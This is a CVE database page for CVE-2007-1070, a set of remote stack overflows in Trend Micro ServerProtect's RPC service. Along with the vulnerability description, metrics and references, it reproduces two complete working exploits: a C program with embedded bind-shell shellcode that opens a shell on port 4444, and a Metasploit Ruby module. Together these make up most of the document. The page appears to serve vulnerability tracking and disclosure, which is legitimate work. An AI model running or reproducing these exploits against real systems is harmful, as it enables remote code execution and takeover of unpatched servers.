CVE-2007-1070 : Detail

CVE-2007-1070

93.29%
V3 Network
2007-02-21 10h00 +00:00
2018-10-16 12h57 +00:00

CVE Descriptions

Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll.

CVE Information

Metrics

Metrics   Score   Severity   CVSS Vector                  Source
V2        10      -          AV:N/AC:L/Au:N/C:C/I:C/A:C   [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4367

Publication date : 2007-09-05 22h00 +00:00
Author : devcode
EDB Verified : Yes

/*
 * Copyright (c) 2007 devcode
 *
 *
 *   ^^ D E V C O D E ^^
 *
 * Trend Micro ServerProtect eng50.dll Stack Overflow
 * [CVE-2007-1070]
 *
 *
 * Description:
 * A boundary error within a function in eng50.dll can be
 * exploited to cause a stack-based buffer overflow via a
 * specially crafted RPC request to the SpntSvc.exe service.
 *
 * Hotfix/Patch:
 * http://www.trendmicro.com/download/product.asp?productid=17
 *
 * Vulnerable systems:
 * ServerProtect for Windows 5.58
 * ServerProtect for EMC 5.58
 * ServerProtect for Network Appliance Filer 5.61
 * ServerProtect for Network Appliance Filer 5.62
 *
 * Tested on:
 * Microsoft Windows 2000 SP4
 *
 * This is a PoC and was created for educational purposes only. The
 * author is not held responsible if this PoC does not work or is
 * used for any other purposes than the one stated above.
 *
 * Notes:
 * <3 TippingPoint for technical details. Had this made few days after
 * disclosure (few months back), was rlsd on r1918 about a week ago
 * and I notice trend micro exploit reports on isc.sans.org. DIDNT KNOW
 * I WAS THIS HOT DAYUM
 *
 */

#include <iostream>
#include <windows.h>

#pragma comment( lib, "ws2_32.lib" )

/* 25288888-bd5b-11d1-9d53-0080c83a5c2c v1.0 */
unsigned char uszDceBind[] =
"\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00"
"\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\x88\x88\x28\x25\x5B\xBD\xD1\x11\x9D\x53\x00\x80\xC8\x3A\x5C\x2C"
"\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
"\x2B\x10\x48\x60\x02\x00\x00\x00";

/* rpc_opnum_0 */
unsigned char uszDceCall[] =
"\x05\x00\x00\x83\x10\x00\x00\x00\x08\x08\x00\x00\x01\x00\x00\x00"
"\xE0\x07\x00\x00\x00\x00\x00\x00\x88\x88\x28\x25\x5B\xBD\xD1\x11"
"\x9D\x53\x00\x80\xC8\x3A\x5C\x2C\x04\x00\x03\x00\xD0\x07\x00\x00";

/* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */
unsigned char uszShellcode[] =
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x76\xd2\xab"
"\x1f\x83\xeb\xfc\xe2\xf4\x8a\xb8\x40\x52\x9e\x2b\x54\xe0\x89\xb2"
"\x20\x73\x52\xf6\x20\x5a\x4a\x59\xd7\x1a\x0e\xd3\x44\x94\x39\xca"
"\x20\x40\x56\xd3\x40\x56\xfd\xe6\x20\x1e\x98\xe3\x6b\x86\xda\x56"
"\x6b\x6b\x71\x13\x61\x12\x77\x10\x40\xeb\x4d\x86\x8f\x37\x03\x37"
"\x20\x40\x52\xd3\x40\x79\xfd\xde\xe0\x94\x29\xce\xaa\xf4\x75\xfe"
"\x20\x96\x1a\xf6\xb7\x7e\xb5\xe3\x70\x7b\xfd\x91\x9b\x94\x36\xde"
"\x20\x6f\x6a\x7f\x20\x5f\x7e\x8c\xc3\x91\x38\xdc\x47\x4f\x89\x04"
"\xcd\x4c\x10\xba\x98\x2d\x1e\xa5\xd8\x2d\x29\x86\x54\xcf\x1e\x19"
"\x46\xe3\x4d\x82\x54\xc9\x29\x5b\x4e\x79\xf7\x3f\xa3\x1d\x23\xb8"
"\xa9\xe0\xa6\xba\x72\x16\x83\x7f\xfc\xe0\xa0\x81\xf8\x4c\x25\x81"
"\xe8\x4c\x35\x81\x54\xcf\x10\xba\xba\x43\x10\x81\x22\xfe\xe3\xba"
"\x0f\x05\x06\x15\xfc\xe0\xa0\xb8\xbb\x4e\x23\x2d\x7b\x77\xd2\x7f"
"\x85\xf6\x21\x2d\x7d\x4c\x23\x2d\x7b\x77\x93\x9b\x2d\x56\x21\x2d"
"\x7d\x4f\x22\x86\xfe\xe0\xa6\x41\xc3\xf8\x0f\x14\xd2\x48\x89\x04"
"\xfe\xe0\xa6\xb4\xc1\x7b\x10\xba\xc8\x72\xff\x37\xc1\x4f\x2f\xfb"
"\x67\x96\x91\xb8\xef\x96\x94\xe3\x6b\xec\xdc\x2c\xe9\x32\x88\x90"
"\x87\x8c\xfb\xa8\x93\xb4\xdd\x79\xc3\x6d\x88\x61\xbd\xe0\x03\x96"
"\x54\xc9\x2d\x85\xf9\x4e\x27\x83\xc1\x1e\x27\x83\xfe\x4e\x89\x02"
"\xc3\xb2\xaf\xd7\x65\x4c\x89\x04\xc1\xe0\x89\xe5\x54\xcf\xfd\x85"
"\x57\x9c\xb2\xb6\x54\xc9\x24\x2d\x7b\x77\x99\x1c\x4b\x7f\x25\x2d"
"\x7d\xe0\xa6\xd2\xab\x1f";

void usage( )
{
	printf("\n\t\tTrend Micro ServerProtect Stack Overflow\n"
	       "\t\t\t(c) 2007 devcode\n\n"
	       "usage: tmicro.exe <ip> <port>\n");
}

int main( int argc, char **argv )
{
	WSADATA wsaData;
	SOCKET sConnect;
	SOCKADDR_IN sockAddr;
	char szRecvBuf[512];
	unsigned char uszPacket[2056];
	int nRet;

	if ( argc < 3 ) {
		usage( );
		return -1;
	}

	if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
		printf("[-] Unable to startup winsock\n");
		return -1;
	}

	sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
	if ( sConnect == INVALID_SOCKET ) {
		printf("[-] Invalid socket\n");
		return -1;
	}

	sockAddr.sin_family = AF_INET;
	sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
	sockAddr.sin_port = htons( atoi( argv[2] ) );

	printf("[+] Connecting to %s:%s\n", argv[1], argv[2] );
	nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot connect to server\n");
		closesocket( sConnect );
		return -1;
	}

	printf("[+] Sending DCE Bind packet...\n");
	nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}

	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
	if ( nRet <= 0 ) {
		printf("[-] Recv failed\n");
		closesocket( sConnect );
		return -1;
	}

	memset( uszPacket, 0x41, sizeof( uszPacket ) );
	memcpy( uszPacket, (const char *)uszDceCall, sizeof( uszDceCall ) );
	memcpy( uszPacket+48, uszShellcode, sizeof( uszShellcode ) - 1 );

	/* call ebx, 0x6574131C, TmRpcSrv.dll */
	/* jmp ebx, 0x7C4E4A66, kernel32.dll */
	memcpy( uszPacket + 1198, "\x1C\x13\x74\x65", 4 );
	memcpy( uszPacket + 2048, "\xD0\x07\x00\x00\xD0\x07\x00\x00", 8 );

	printf("[+] Sending DCE Request packet...\n");
	nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
	if ( nRet == SOCKET_ERROR ) {
		printf("[-] Cannot send\n");
		closesocket( sConnect );
		return -1;
	}

	printf("[+] Check shell on port 4444 :)\n");
	nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
	closesocket( sConnect );

	return 0;
}

// milw0rm.com [2007-09-06]
Exploit Database EDB-ID : 16827

Publication date : 2010-04-29 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::DCERPC

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Trend Micro ServerProtect 5.58 Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
				By sending a specially crafted RPC request, an attacker could overflow the
				buffer and execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					['CVE', '2007-1070'],
					['OSVDB', '33042'],
					['BID', '22639'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'          => 800,
					'BadChars'       => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Trend Micro ServerProtect 5.58 Build 1060', { 'Ret' => 0x6563124c } ], # CALL EBX - StCommon.dll
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 20 2007'))

		register_options(
			[
				Opt::RPORT(5168)
			], self.class)
	end

	def exploit
		connect

		handle = dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		filler = payload.encoded + rand_text_english(1600 - payload.encoded.length) + [target.ret].pack('V')
		len = filler.length

		# CMON_NetTestConnection
		sploit = NDR.long(0x000a0017) + NDR.long(len) + filler + NDR.long(0)

		print_status("Trying target #{target.name}...")

		begin
			dcerpc_call(0, sploit)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2003_server >> Version r2
Microsoft>>Windows_2003_server >> Version sp2
Microsoft>>Windows_nt >> Version *
Microsoft>>Windows_vista >> Version *
Microsoft>>Windows_xp >> Version *
Trend_micro>>Serverprotect >> Version 5.58

Configuration 0

Trend_micro>>Serverprotect >> Version 5.58
Trend_micro>>Serverprotect >> Version 5.61
Trend_micro>>Serverprotect >> Version 5.62

References

http://www.kb.cert.org/vuls/id/466609
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/24243
Tags : third-party-advisory, x_refsource_SECUNIA
http://osvdb.org/33042
Tags : vdb-entry, x_refsource_OSVDB
http://www.kb.cert.org/vuls/id/630025
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.kb.cert.org/vuls/id/730433
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/22639
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/0670
Tags : vdb-entry, x_refsource_VUPEN
http://www.kb.cert.org/vuls/id/349393
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securitytracker.com/id?1017676
Tags : vdb-entry, x_refsource_SECTRACK